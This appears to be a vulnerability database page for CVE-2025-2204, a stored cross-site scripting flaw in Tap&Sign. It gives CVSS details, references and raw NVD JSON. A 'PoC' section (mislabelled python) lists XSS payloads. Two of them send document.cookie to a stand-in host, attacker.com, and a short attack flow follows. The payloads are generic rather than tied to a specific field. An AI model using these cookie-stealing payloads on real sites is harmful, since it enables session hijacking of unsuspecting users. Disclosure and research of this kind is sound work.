CVE-2025-2204

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS).This issue affects Tap&Sign: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tap&Sign <= 23012026

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-2204 Tap&Sign XSS PoC -->
<!-- 存储型XSS payload，需要高权限用户身份 -->

<!-- 基础XSS payload -->
<script>alert(document.cookie)</script>

<!-- 事件处理器XSS payload -->
<img src=x onerror=alert('XSS')>

<!-- 窃取会话Cookie的payload -->
<script>
document.write('<img src="http://attacker.com/steal?cookie='+document.cookie+'">');
</script>

<!-- 完整利用示例（需在Tap&Sign的文本输入框中提交） -->
Payload: <svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- 攻击流程: -->
<!-- 1. 攻击者以高权限用户登录Tap&Sign系统 -->
<!-- 2. 在存在漏洞的输入字段中注入恶意XSS payload -->
<!-- 3. 恶意脚本被存储到数据库 -->
<!-- 4. 其他用户访问包含恶意内容的页面 -->
<!-- 5. 恶意脚本在受害者浏览器中执行 -->
<!-- 6. 攻击者获取用户会话或敏感信息 -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-2204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-2204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-2204/
[4] VulDB https://vuldb.com/cve/CVE-2025-2204
[5] https://www.usom.gov.tr/bildirim/tr-26-0004

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-2204", "sourceIdentifier": "[email protected]", "published": "2026-01-23T12:15:48.463", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS).This issue affects Tap&Sign: through 23012026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (XSS o 'cross-site scripting') en Tapandsign Technologies Software Inc. Tap&Sign permite cross-site scripting (XSS). Este problema afecta a Tap&Sign: hasta el 23012026.\n\nNOTA: Se contactó al proveedor con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0004", "source": "[email protected]"}]}}